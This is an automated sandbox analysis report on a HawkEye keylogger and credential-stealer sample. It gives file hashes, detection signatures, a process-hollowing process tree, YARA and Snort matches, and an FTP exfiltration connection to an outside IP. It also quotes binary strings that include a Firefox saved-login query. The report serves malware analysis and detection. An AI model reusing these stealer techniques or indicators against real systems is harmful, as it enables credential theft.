Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ypBoHI5G3x

Overview

General Information

Sample Name:ypBoHI5G3x (renamed file extension from none to exe)
Analysis ID:454641
MD5:08d679d4b9a12137756cc9244bd6f017
SHA1:580c29bc356057d76873c9c453ed466e1024b7f2
SHA256:047f33e6f83796d9fc056d7006a6e8ef69696d63eceb29fb1592bb13a62e79bf
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ypBoHI5G3x.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\ypBoHI5G3x.exe' MD5: 08D679D4B9A12137756CC9244BD6F017)
    • InstallUtil.exe (PID: 6456 cmdline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • vbc.exe (PID: 5560 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 5432 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
      • 0x37e24:$hawkstr1: HawkEye Keylogger
      • 0x3b150:$hawkstr1: HawkEye Keylogger
      • 0x3b4d0:$hawkstr1: HawkEye Keylogger
      • 0x3d994:$hawkstr1: HawkEye Keylogger
      • 0x378dc:$hawkstr2: Dear HawkEye Customers!
      • 0x3b1b0:$hawkstr2: Dear HawkEye Customers!
      • 0x3b530:$hawkstr2: Dear HawkEye Customers!
      • 0x37a0a:$hawkstr3: HawkEye Logger Details:
      00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
      • 0xfdd61:$key: HawkEyeKeylogger
      • 0x17fe1f:$key: HawkEyeKeylogger
      • 0x2022ff:$key: HawkEyeKeylogger
      • 0xfff5f:$salt: 099u787978786
      • 0x18201d:$salt: 099u787978786
      • 0x2044fd:$salt: 099u787978786
      • 0xfe37a:$string1: HawkEye_Keylogger
      • 0xff1cd:$string1: HawkEye_Keylogger
      • 0xffebf:$string1: HawkEye_Keylogger
      • 0x180438:$string1: HawkEye_Keylogger
      • 0x18128b:$string1: HawkEye_Keylogger
      • 0x181f7d:$string1: HawkEye_Keylogger
      • 0x202918:$string1: HawkEye_Keylogger
      • 0x20376b:$string1: HawkEye_Keylogger
      • 0x20445d:$string1: HawkEye_Keylogger
      • 0xfe763:$string2: holdermail.txt
      • 0xfe783:$string2: holdermail.txt
      • 0x180821:$string2: holdermail.txt
      • 0x180841:$string2: holdermail.txt
      • 0x202d01:$string2: holdermail.txt
      • 0x202d21:$string2: holdermail.txt
      Click to see the 26 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.InstallUtil.exe.7750000.11.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
      • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
      12.2.InstallUtil.exe.2b6ec2c.6.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
      • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
      12.2.InstallUtil.exe.3b39930.7.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        12.2.InstallUtil.exe.45fa72.2.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          19.2.vbc.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            Click to see the 82 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Possible Applocker BypassShow sources
            Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\Desktop\ypBoHI5G3x.exe' , ParentImage: C:\Users\user\Desktop\ypBoHI5G3x.exe, ParentProcessId: 6504, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ProcessId: 6456

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: ypBoHI5G3x.exe.6504.1.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
            Multi AV Scanner detection for submitted fileShow sources
            Source: ypBoHI5G3x.exeVirustotal: Detection: 28%Perma Link
            Source: ypBoHI5G3x.exeReversingLabs: Detection: 32%
            Machine Learning detection for sampleShow sources
            Source: ypBoHI5G3x.exeJoe Sandbox ML: detected
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpackAvira: Label: TR/Inject.vcoldi
            Source: 12.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
            Source: 12.2.InstallUtil.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpackAvira: Label: TR/Inject.vcoldi
            Source: ypBoHI5G3x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: unknownHTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.6:49723 version: TLS 1.0
            Source: ypBoHI5G3x.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp
            Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599966159.00000000008B2000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
            Source: Binary string: InstallUtil.pdb source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpBinary or memory string: autorun.inf
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpBinary or memory string: [autorun]
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpBinary or memory string: autorun.inf
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpBinary or memory string: [autorun]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then push dword ptr [ebp-24h]
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then push dword ptr [ebp-24h]
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then xor edx, edx
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then xor edx, edx
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then push dword ptr [ebp-20h]
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then push dword ptr [ebp-20h]
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then jmp 05FF51E0h
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then jmp 05FF51E0h
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then jmp 0516A630h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then jmp 0516A630h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.6:49759 -> 45.141.152.18:21
            Source: global trafficTCP traffic: 192.168.2.6:49760 -> 45.141.152.18:62998
            Source: Joe Sandbox ViewIP Address: 45.141.152.18 45.141.152.18
            Source: Joe Sandbox ViewIP Address: 45.141.152.18 45.141.152.18
            Source: Joe Sandbox ViewASN Name: M247GB M247GB
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownFTP traffic detected: 45.141.152.18:21 -> 192.168.2.6:49759 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: unknownHTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.6:49723 version: TLS 1.0
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: www.google.com
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: http://ftp.vngpack.com
            Source: ypBoHI5G3x.exe, 00000001.00000003.347743311.000000000736F000.00000004.00000001.sdmp, ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
            Source: ypBoHI5G3x.exe, 00000001.00000003.347743311.000000000736F000.00000004.00000001.sdmp, ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
            Source: ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g%%N
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: ypBoHI5G3x.exe, 00000001.00000002.448077774.0000000003167000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
            Source: ypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: InstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com-sM
            Source: InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com.F
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
            Source: InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comou
            Source: InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comro
            Source: InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comue
            Source: InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comva
            Source: InstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comw
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFD
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comay
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdR
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitu
            Source: InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coml1
            Source: InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
            Source: InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm(
            Source: InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
            Source: InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comu
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnhic
            Source: InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cno
            Source: InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnomp$
            Source: InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cntra:
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: InstallUtil.exe, 0000000C.00000003.456469435.0000000005D49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/D
            Source: InstallUtil.exe, 0000000C.00000003.456469435.0000000005D49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
            Source: InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/R
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Verdk
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/adnl
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
            Source: InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cs-c
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/settR
            Source: InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/wuR
            Source: InstallUtil.exe, 0000000C.00000003.457780221.0000000005D49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/wvR
            Source: InstallUtil.exe, 0000000C.00000003.468375972.0000000005D70000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.S
            Source: vbc.exe, vbc.exe, 00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
